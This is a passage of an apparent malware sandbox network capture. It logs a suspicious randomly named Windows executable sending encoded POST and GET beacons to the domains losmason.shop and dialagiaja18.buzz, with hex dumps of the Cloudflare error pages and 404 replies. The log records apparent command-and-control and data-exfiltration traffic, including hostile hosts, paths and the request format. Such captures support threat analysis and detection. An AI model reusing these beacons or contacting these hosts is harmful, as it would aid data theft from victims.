\| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&
Jan 11, 2025 07:59:20.786873102 CET	224	IN	Data Raw: 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 65 72 72 6f 72 2d 66 65 65 64 62 61 63 6b 2d 73 75 Data Ascii: JSON.stringify){var e=function(a){var c=document.getElementById("error-feedback-survey"),d=document.getElementById("error-feedback-success"),b=new XMLHttpRequest;a={event:"feedback clicked",properties:{errorCode:1001,helpful
Jan 11, 2025 07:59:20.786884069 CET	1236	IN	Data Raw: 3a 61 2c 76 65 72 73 69 6f 6e 3a 31 7d 7d 3b 62 2e 6f 70 65 6e 28 22 50 4f 53 54 22 2c 22 68 74 74 70 73 3a 2f 2f 73 70 61 72 72 6f 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 70 69 2f 76 31 2f 65 76 65 6e 74 22 29 3b 62 2e 73 65 74 52 Data Ascii: :a,version:1}};b.open("POST","https://sparrow.cloudflare.com/api/v1/event");b.setRequestHeader("Content-Type","application/json");b.setRequestHeader("Sparrow-Source-Key","c771f0e4b54944bebf4261d44bd79a1e");b.send(JSON.stringify(a));c.classLis
Jan 11, 2025 07:59:20.786895037 CET	1236	IN	Data Raw: 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 31 30 30 31 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 Data Ascii: pan> <span>1001</span> </h1> <span class="inline-block md:block heading-ray-id font-mono text-15 lg:text-sm lg:leading-relaxed">Ray ID: 900306068d0243fe •</span> <span class="inline-block md:block hea
Jan 11, 2025 07:59:20.786906004 CET	1236	IN	Data Raw: 70 20 66 6f 72 20 43 6c 6f 75 64 66 6c 61 72 65 20 69 74 20 63 61 6e 20 74 61 6b 65 20 61 20 66 65 77 20 6d 69 6e 75 74 65 73 20 66 6f 72 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 62 65 20 64 69 73 Data Ascii: p for Cloudflare it can take a few minutes for the website's information to be distributed to our global network.</li> <li><strong>Less likely:</strong> something is wrong with this site's configuration. Usually this happens whe
Jan 11, 2025 07:59:20.786916971 CET	1236	IN	Data Raw: 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 Data Ascii: s="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">900306068d0243fe</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" cla
Jan 11, 2025 07:59:20.786926031 CET	129	IN	Data Raw: 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e Data Ascii: /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49981	104.18.73.116	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:22.889841080 CET	1749	OUT	POST /uktz/ HTTP/1.1 Host: www.losmason.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.losmason.shop Referer: http://www.losmason.shop/uktz/ Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 75 50 47 30 48 47 32 56 76 2b 44 65 5a 76 31 79 45 38 6a 39 64 76 43 71 67 6c 4d 6d 72 6d 74 38 79 6e 5a 6c 44 32 67 45 4a 62 74 73 45 53 6e 6d 6b 6a 39 4e 52 70 66 67 45 4c 68 43 2f 69 7a 2f 43 33 69 43 4d 49 73 39 78 6d 49 50 71 74 2b 6f 4e 4c 51 4e 6b 6c 68 48 30 76 5a 48 4f 44 4f 47 51 72 47 68 76 5a 2b 68 48 52 4e 44 41 41 70 71 4f 42 4e 76 5a 4b 4d 42 67 55 45 4f 7a 50 70 62 50 38 46 33 46 58 6f 30 4e 31 55 7a 71 61 69 64 5a 39 51 56 31 65 41 6f 6b 6e 75 66 50 35 2b 6e 57 63 58 65 49 63 74 2f 7a 72 57 2f 58 37 73 4b 70 65 62 53 37 79 49 34 6b 35 6d 44 59 38 73 30 32 6c 42 56 6d 61 7a 51 5a 4f 75 2b 7a 78 6a 5a 4e 4b 42 4c 57 76 54 51 42 62 58 72 7a 6d 34 53 74 55 56 57 62 55 67 36 36 73 44 64 52 2f 44 64 4a 79 62 64 48 4d 4f 42 53 69 67 6d 39 70 6b 6f 7a 74 76 62 58 63 50 66 73 5a 4b 2f 6a 71 41 55 53 44 4f 75 6c 58 71 31 64 4c 41 6a 46 50 7a 35 73 6c 36 52 70 2f 63 35 6f 35 65 6d 46 71 6f 35 35 64 59 6c 4b 46 70 6b 65 4b 6f 57 2f 57 6f 35 68 63 6e 76 52 59 6c 62 64 33 [TRUNCATED] Data Ascii: oxIxzhP=uPG0HG2Vv+DeZv1yE8j9dvCqglMmrmt8ynZlD2gEJbtsESnmkj9NRpfgELhC/iz/C3iCMIs9xmIPqt+oNLQNklhH0vZHODOGQrGhvZ+hHRNDAApqOBNvZKMBgUEOzPpbP8F3FXo0N1UzqaidZ9QV1eAoknufP5+nWcXeIct/zrW/X7sKpebS7yI4k5mDY8s02lBVmazQZOu+zxjZNKBLWvTQBbXrzm4StUVWbUg66sDdR/DdJybdHMOBSigm9pkoztvbXcPfsZK/jqAUSDOulXq1dLAjFPz5sl6Rp/c5o5emFqo55dYlKFpkeKoW/Wo5hcnvRYlbd3kLCUtATiKS59GxeoO4CVu0QqzBmEDFEbiTTyFmNLsymNNuD0s/84tJLyyOeq3BfG3UWsaGTpNk0m0Jk1qvXk6jJ2v3r7eDfALq+WYMQG2zNy4iyHXy1R7sNz7H4v6IoDG7kHtqpeGGYJARWI0HZLXIAysSl49z0KvnawT8amXRg6R0Uep5V1uu+F5RoyAt8Lhthv/Fkr2b6TRBw+wpwZW4ugbLWbtpT+KQohyD+LC1f0HGgiq95QLLJR+5WKcM01YwRPvIdYgxS9uu5qSfnZUNLdjKnvEuX4SeK/chXBTFPs8j8BTiyS16IGjMnzk3VGyh3ubSCX3ecp7y30unFfx4Y2JS/cnb18bQ6FHRheb+OrL4NjryXQXU8Yh1i1AMJ0jW7TYSlLr8s91PGHVlljZZH7v4Sq4B1YWv58iJpewUn9g0oysbuFZlj/q0g+T2T4wAoA+NNXuZL0MzwMIGZBGgMyUznfUKeBbVLYHMTilnR8CeQkngwKWB0RrLYBHWLnmQvDXuflkGieBiLx8dj6Wo9asNt8BniaFAPHZR0upebRSmkIEFe2A4wkdjH2vGp/pEjJGNIH9Vf8anB6+ReYNPhXBlnt00R2Gmkts0wK+IAFapEfDd0R1zgrlpGCvhVzrhH7rbjPcRXO90Jf1E5TFR+2eXZGLRJ1Ld [TRUNCATED]
Jan 11, 2025 07:59:23.341720104 CET	1236	IN	HTTP/1.1 409 Conflict Date: Sat, 11 Jan 2025 06:59:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6119 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 900306168ef642e6-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 20 72 65 73 6f 6c [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error \| www.losmason.shop \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&
Jan 11, 2025 07:59:23.341746092 CET	1236	IN	Data Raw: 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 65 72 72 6f 72 2d 66 65 65 64 62 61 63 6b 2d 73 75 Data Ascii: JSON.stringify){var e=function(a){var c=document.getElementById("error-feedback-survey"),d=document.getElementById("error-feedback-success"),b=new XMLHttpRequest;a={event:"feedback clicked",properties:{errorCode:1001,helpful:a,version:1}};b.op
Jan 11, 2025 07:59:23.341759920 CET	1236	IN	Data Raw: 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 69 6e 6c 69 Data Ascii: pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span> <sp
Jan 11, 2025 07:59:23.341774940 CET	1236	IN	Data Raw: 65 6e 74 69 61 6c 20 63 61 75 73 65 73 20 6f 66 20 74 68 69 73 3a 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6c 2d 31 30 20 6d 74 2d 36 20 74 65 78 74 2d 31 35 20 74 65 78 74 2d 62 6c 61 63 6b 2d 64 61 Data Ascii: ential causes of this:</p> <ul class="ml-10 mt-6 text-15 text-black-dark antialiased leading-normal"> <li class="mb-4"><strong class="font-semibold">Most likely:</strong> if the owner just signed up for Cloudflare it
Jan 11, 2025 07:59:23.341789961 CET	1236	IN	Data Raw: 20 54 68 61 6e 6b 20 79 6f 75 20 66 6f 72 20 79 6f 75 72 20 66 65 65 64 62 61 63 6b 21 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 Data Ascii: Thank you for your feedback! </div></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <s
Jan 11, 2025 07:59:23.341804981 CET	353	IN	Data Raw: 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 61 Data Ascii: st.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div>... /#cf-error-details

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49984	104.18.73.116	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:25.430177927 CET	450	OUT	GET /uktz/?oxIxzhP=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITkWdF4d9GHTGCKMj1pNCfIk9qc2JEKRZoPPtZrmwk1MspVw==&qHO8p=hd0DQ8 HTTP/1.1 Host: www.losmason.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 07:59:25.868436098 CET	406	IN	HTTP/1.1 409 Conflict Date: Sat, 11 Jan 2025 06:59:25 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 90030626593a8c17-EWR Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49985	66.29.148.78	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:30.944973946 CET	724	OUT	POST /o7bo/ HTTP/1.1 Host: www.dialagiaja18.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dialagiaja18.buzz Referer: http://www.dialagiaja18.buzz/o7bo/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 31 4f 4f 56 66 45 30 72 42 44 4a 37 56 4a 41 42 63 64 62 4a 62 36 36 49 6f 35 50 57 70 49 76 57 48 6b 45 79 7a 62 7a 69 78 34 75 36 48 6b 65 4e 34 79 76 61 4b 74 4e 41 78 36 76 74 4a 44 4c 46 2b 71 31 7a 75 54 71 79 73 2f 30 62 6d 78 56 6a 5a 58 53 34 43 43 49 4d 63 47 59 50 54 61 79 68 52 65 4f 44 44 41 36 76 78 37 4e 6b 30 64 41 48 76 68 73 59 73 4c 37 73 6a 65 70 75 4c 2f 67 62 75 6a 57 33 35 6d 66 46 69 70 6a 77 33 70 69 64 4b 66 50 64 31 67 6b 73 4e 6b 59 4b 5a 65 75 4e 64 54 65 6a 34 73 32 6d 4a 76 48 31 4c 53 67 2b 7a 6a 2b 6c 58 38 51 53 41 52 6f 3d Data Ascii: oxIxzhP=mQlJ43QWk2uw1OOVfE0rBDJ7VJABcdbJb66Io5PWpIvWHkEyzbzix4u6HkeN4yvaKtNAx6vtJDLF+q1zuTqys/0bmxVjZXS4CCIMcGYPTayhReODDA6vx7Nk0dAHvhsYsL7sjepuL/gbujW35mfFipjw3pidKfPd1gksNkYKZeuNdTej4s2mJvH1LSg+zj+lX8QSARo=
Jan 11, 2025 07:59:31.515908957 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 06:59:31 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 11, 2025 07:59:31.515919924 CET	224	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting co
Jan 11, 2025 07:59:31.515928984 CET	92	IN	Data Raw: 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 Data Ascii: mpany and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49986	66.29.148.78	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:33.513623953 CET	744	OUT	POST /o7bo/ HTTP/1.1 Host: www.dialagiaja18.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dialagiaja18.buzz Referer: http://www.dialagiaja18.buzz/o7bo/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 33 71 4b 56 5a 6a 6f 72 44 6a 4a 36 5a 70 41 42 56 39 62 56 62 36 6d 49 6f 34 62 38 71 36 37 57 48 47 63 79 79 5a 62 69 77 34 75 36 4d 45 65 49 38 79 75 57 4b 74 42 79 78 2f 58 74 4a 41 33 46 2b 6f 64 7a 75 67 53 7a 2b 2f 30 64 75 52 56 68 47 6e 53 34 43 43 49 4d 63 47 4d 6c 54 61 71 68 51 75 65 44 43 6c 4f 75 38 62 4e 6a 7a 64 41 48 34 78 73 63 73 4c 36 35 6a 66 30 4c 4c 37 51 62 75 69 6d 33 36 31 48 47 6f 70 6a 4d 7a 70 6a 2f 43 39 6e 52 39 6d 6f 4e 4b 58 68 49 43 74 65 72 63 6c 76 4a 69 4f 2b 4f 61 50 72 4e 62 42 6f 4a 69 54 66 4d 4e 66 41 69 65 47 38 49 69 41 75 69 73 6e 63 47 42 50 41 67 75 41 6a 6c 78 43 4a 4c Data Ascii: oxIxzhP=mQlJ43QWk2uw3qKVZjorDjJ6ZpABV9bVb6mIo4b8q67WHGcyyZbiw4u6MEeI8yuWKtByx/XtJA3F+odzugSz+/0duRVhGnS4CCIMcGMlTaqhQueDClOu8bNjzdAH4xscsL65jf0LL7Qbuim361HGopjMzpj/C9nR9moNKXhICterclvJiO+OaPrNbBoJiTfMNfAieG8IiAuisncGBPAguAjlxCJL
Jan 11, 2025 07:59:34.086443901 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 06:59:34 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 11, 2025 07:59:34.086462975 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49987	66.29.148.78	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:36.061486006 CET	1761	OUT	POST /o7bo/ HTTP/1.1 Host: www.dialagiaja18.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.dialagiaja18.buzz Referer: http://www.dialagiaja18.buzz/o7bo/ Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 6d 51 6c 4a 34 33 51 57 6b 32 75 77 33 71 4b 56 5a 6a 6f 72 44 6a 4a 36 5a 70 41 42 56 39 62 56 62 36 6d 49 6f 34 62 38 71 36 6a 57 47 31 55 79 39 59 62 69 69 6f 75 36 42 6b 65 4a 38 79 76 4d 4b 74 5a 32 78 2b 72 39 4a 47 37 46 2f 4c 6c 7a 6f 52 